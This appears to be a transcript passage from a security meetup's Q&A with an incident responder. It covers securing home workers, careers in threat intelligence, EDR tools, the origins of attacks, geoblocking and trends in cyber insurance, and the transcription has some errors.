the modem in and they put a you know it could be god knows what kind of router they're using um but they don't have any security set into it they're not even using you know wpa they're using completely or the thing is so old it's ancient and uh so getting control and putting some controls on that is you know if somebody wants to work from home you know you need to help them out a little bit with that from an organization standpoint um so we have seen some organizations do that to tell you how bad it can be i was at cvs we had a work from home employee that was living in iowa that was using dial up to a party line

and that's all hypno information at cvs so yeah it's it is a challenge it's going to be a challenge um i know that there are some companies that are working on some new products that are coming out that for this very challenge but i don't think it's they're mature enough yet to be deployed so first things first make sure that anything touches that touches your network has your security tools on it can be monitored and nothing connects unless it's your vpn hey keith um thank you going off of uh luke's question uh for someone who is not currently in infosec but looking to transition into it from a different field but targeting moving into cti into

threat intel what kind of path would you um recommend there is there you know spending some time in a sock first or what would you recommend that's kind of the stepping stones to move into cti i think it would i think spending some time in a sock to start out is the key i teach at the university of advancing technology here in phoenix i tell all the guys there go get your go get your foot in the door of the sock now you're seeing everything live time and it gives you a great reference point to move into cti because you've seen the actions of the people that you're studying okay you see what they're doing

to start out just in cti alone you're missing that operational component okay i'm a big fan of general uh stanley mcchrystal he wrote the book called team of teams and uh general mcchrystal was the guy who hunted down elsa carly in iraq and when he got to iraq they had a problem you had all the intel people over here doing their thing and they had the seal team operators and delta over here doing their thing and they were both barking at each other because the intel guys are giving out old intel and the operators like hey we're getting wiped out out here because of your old intel and you know and the intel guys like

well you're giving us you know hard drives and crap we don't even know where it came from so what the crystal did is he made the intel people go out on some of the raids with the operators and he made the operators go sit down with the intel people if you watch the movie zero dark 30 after they kill bin laden in the movie you'll see the seal team six bagging and tagging everything that's because of what gentleman crystal did so that operational and you know being able to mesh operations and intelligence like that is the key so i would start in a sock get your foot in the door of the sock start looking at what's going on

watch the attacks going on live time see the techniques these guys are doing then start moving into threat intelligence from there the sock is i think is the key to any career in information security start there and then hey i like doing this or i like doing that and you can work your way through it thanks no problem anytime hey keith you specifically mentioned uh crowdstrike and um um the other one um oh carbon black carbon black yeah uh what about others the microsoft atps the other products in that are there any that you specifically do or don't and like and why you know i don't i don't know the reason i talk about crowdstrike and karen blacker those are

the two that most and that i've used in in defending in enterprise environments um there's a lot of really good tools out there microsoft atp microsoft is really working hard to bring up their security level we've had some clients have pretty good luck with that um sentinel one i've seen some really good things coming out of sentinel one so there's a lot of really great tools out there as long as the tool is number one it can be monitored and it's not just looking at file signatures it's looking at file behaviors and process behaviors that's a start um the crowdstrike falcon platform i'm a i'm a big interface guy okay if it takes me 80 clicks or i have

to write 27 command lines to try to get the information that's wasting time and during an incident time is of the essence so if that interface does something like that that's a big factor to me and that's something to take a look at when you're dealing with these things how is that information being presented to your people so you can take action quickly because the quicker i go that's bad and you can hit that isolate button the better that's the big factor when i'm looking at it because a lot of these things are really really close to what they can do in in in scope but to me i think that easy use is key so

um i wouldn't say there's anyone that i would stay away from or anything like that or that i would endorse i just talk about crowdstrike and carl black because i'm very familiar with those interfaces because i've used both worlds in large environments thanks anytime yeah absolutely guys david just a comment there so i was talk talking to our our managed services person this morning um and he has done an atp or an apt sorry simulation between two of those products sentinel one and um and crowdstrike um and the only reason i make the comment is he said during that simulation crowdstrike detected 13 more you know events of of that simulation than sentinel one so there definitely is there are

differences between the products and they are going to catch different things um you know they're they're and we we partner with sofos for one of those smaller businesses that may not be able to to go with a crowdstrike type play um they're all going to be different but i think at the end of the day to a point keith made earlier one of those you know whatever you choose that is an edr platform is going to be better than not having an edr platform yeah absolutely and i'm sorry ryan that you had to talk to mullins this morning that's never good first thing you know you're talking about dude we we give each other crap we have to make each

other smile around here because there's some long days and some long nights so i was up to four o'clock in the morning the other night doing some communications and i'm an old man i can't be doing that anymore keith i appreciate your time today um i just had a question about where you see uh a lot of the countries that are attacking i mean you hear a lot about russia and romania somebody if you saw a lot of other countries as well that were big players that we should look out for that maybe don't get as much media attention you know um most of our guys we call it kiev time that's the joker on my team

we're talking to these guys is because they come from that old eastern block the old soviet bloc i was in the military in the 80s that was the evil empire back then right and when after everything broke up that's where we see a lot of these guys come from i've actually been able to listen to these guys when they they called one of our victims and left the voicemail and they're absolutely from that area so i would say anything coming out of you know if it's got stan in the name or way too many consonants that i can't pronounce i'm not trying to be funny i can't pronounce half of those countries names i just

can't well yeah all that serbia bosnia um that whole area nigeria is very active the old princes are at it man they figured out they can make money on this one um we have seen argentina on a couple of cases uh the problem being is that with vpn's services out there i can look like i'm coming from anywhere so that's that's the big issue is that with the vpn uh looks like i'm coming from the netherlands well the netherlands is not a traditional uh adversary but we do see a lot of activity coming out of the netherlands lately off of vpn services so it's very difficult um i tell we tell clients a lot that if listen if you

don't do a business outside the united states petal block geoblock why is that cbs we geoblock there's not a cvs store in china russia or europe geoblock anything that comes from outside the united states and uh so i was that one was easy american express that was a little bit more difficult so all right thanks hey keith oh this is adam i got a question for you um just to clarify um you typically work with cyber insurance companies but but you guys don't provide insurance is that correct yeah we don't provide insurance but we're not that big uh we but we the cyber insurance companies will hire the breach approaches in us um because you have to be on the board or

the panel or whatever they call it um and you have to be approved by the cyber insurance company and then i think we're on everybody's panel we've been around a long time pretty much everybody's final and then they bring us in excellent so um but so i i'd imagine you you probably you know typically work with them or at least with your customers and everything so the question i have is about cyber security insurance and basically what insurance will look like in the next five or ten years um you know right right now you know there's a thought that having insurance may incentivize cyber criminals to kind of engage knowing that a company may have you know

kind of the financial backing to pay the rent somewhere um you know i i don't know if i would agree with that um i think that it is a factor but i don't think it's the only factor i think overall these groups know about cyber insurance from a you know an umbrella standpoint but i don't think having a having insurance it's not like these guys have a list of who has insurance and who doesn't right they don't have that kind of information um i know that cyber insurance is changing um i had a call with the vice president of cyber for hanover insurance and the way that they write these policies is changing um because they're they're

losing money on these things up and right insurance companies don't like to lose money um they're gonna i think what you're gonna start seeing is in order to get a cyber insurance policy you're going to have to meet some minimum standards as far as security posture goes i see that coming rather quickly i know they're really talking about mfa and you know at a minimum having mfa involved which i mean a mfa is great but it's not the end of deal that's i'm talking to them about that so i think you're going to see some stuff start to pop up on that side of it um but i think in this case here i think

having not having cyber insurance would be the risk of that would be far outweigh uh uh the risk of getting hit i mean that i would not go without it excellent yeah yeah i agree that that was he actually kind of touched on the follow-up question to that which is you know my kind of understanding is that you know a lot of these companies you know when it when there's a catastrophic event you know they could it can contribute to the insurers leaving the market um you know entirely and and kind of kind of the idea of where there's you know no they're not able to or aren't imposing any kind of obligations or at least can't prove like

you know it's not like they're collecting data to show you know what we are and aren't doing um uh uh or you know that that we're following any kind of best practices you know as a policy holder so um so yeah yeah that's excellent thank you yeah and i know i know that ryan and his team uh you know they deal with the carriers all the time and they're trying to get us in front of these characters to try to influence a little bit of that also um because it's all about the information you get right and you know square shooting is the way to go and that's why i told the guys from hanover

i said listen here's the deal mfa is cool but there's ways around mfa and you got to have some more some more tools in there we talked actually the same same style of presentation not the same one like i talked about a lot of these different tools with them so i would expect them to start bringing that stuff up you know um but they're not i would honestly i see them saying this if you don't have this minimum based on we're not going to insure you yeah absolutely i agree and talking to some of these insurers and having folks on our team who who work in the insurance space mfa um most insurers now consider an

uninsurable risk so if you don't have it they will not insure you um they're seeing a lot of changes as far as how policies are written there's a lot of talk with breach coaches about if ransomware itself is called out in a policy um if they if insurers will continue to provide coverage for that um you're seeing large companies who are are really starting to in some cases self-insured they have really high caps a lot of those smaller businesses where insurance companies are just killing it and making a ton of money in premiums um you know they typically have pretty low retentions and low caps but on that end you're paying a lot for that type of policy

so um there's a there's a lot going on in the cyber insurance space like he said they're they are bleeding money um heavily but on the on the flip side of that premiums are going up for for everyone and i i think last year or this year your premiums have increased you know 50 since last year so you know that puts organizations small organizations in a really tough spot um and there's a lot to weigh there from a business perspective yeah and it's very difficult to write a cyber insurance policy because the you know an auto policy oh my god these guys have got data galore that they can set rates based upon all this information they

have but with cyber insurance it's fairly new product and the information and the threats and the risks change by the minute so this is a this is a hard world for the insurance companies to to to get into honestly i i i could see some insurance companies we're out of sight um but we're gonna we're not deciding so it's gonna be an interesting thing coming up um you know ransomware and the cyber extortion is going to evolve it'll never go away uh it'll evolve if if the body administration came down today and said no no paying ransomware groups they're going to figure out a way to get around that and there's going to be a way that you

know they're going to make money and that's just the way criminals are you know back in the day when i started stolen property was sold at a flea market to a pawn shop today they're just selling it on craigslist and offer up right it's just it's an evolution and that's going to continue it'll be really interesting to see from the insurance perspective um this is like new within the past two or three weeks but the big insurers such as aig access beasley chubb who hold a lion's share of the market share for cyber policies they just started a new consortium um called cyber accuvu and the goal of that you know my understanding is to really

compile a lot of that data to try and understand trends risks things like that um to one help policyholders but then obviously they need to understand the data collectively to make better power decisions for the their market in general so um you know it'll be interesting to see what comes out of that yeah it's so it you know it's going to be an ever evolving place i would definitely keep an eyeball on it um you know it's not like like my homeowner's policy i just you know it goes away until you know one of our boobs comes in and rips my roof off but um you know it's going to be different you have to keep an eyeball on these

policies and keep up on it because it's going to be changing and the and all of that is just is every evolver like ryan said there's so many changes this this environment that we work in and information security you guys know this it's never the same day-to-day every case is different every attack is different every group uses different tactics and tools and that's what makes it extremely difficult with insurers excellent i appreciate the response thank you if you guys ever see uh if you ever want to see one of our haboobs look it up on the internet because i live on the south side of phoenix and that sucker hits me every time when it comes in

the back side of my house is a lighter shade of brown than the front side because of all the sand that's hidden over the years all right any other questions for keith before we wrap up today i know we're at the top of the hour but happy to go a few extra if there's any questions all right guys i'm here for you um you know my team's always available for you if you guys pick up something to send me an email say hey keith i was at you is a presentation um like i just questioned that question always willing to help guys i would rather talk to you guys in a situation like this or a couple of

questions then during an incident you guys are up all night drinking red bulls and monsters all right well that concludes this month's meeting we'll be back in august the second friday make sure like mike said to get your ticket for b signs uh i saw chad drop that in the chats at the top there and then also uh if you're interested in speaking there's an open cfp we'd love to have more folks from the greenville area get out and talk to that so uh have a great rest of your week have a great weekend all uh we'll see you guys next month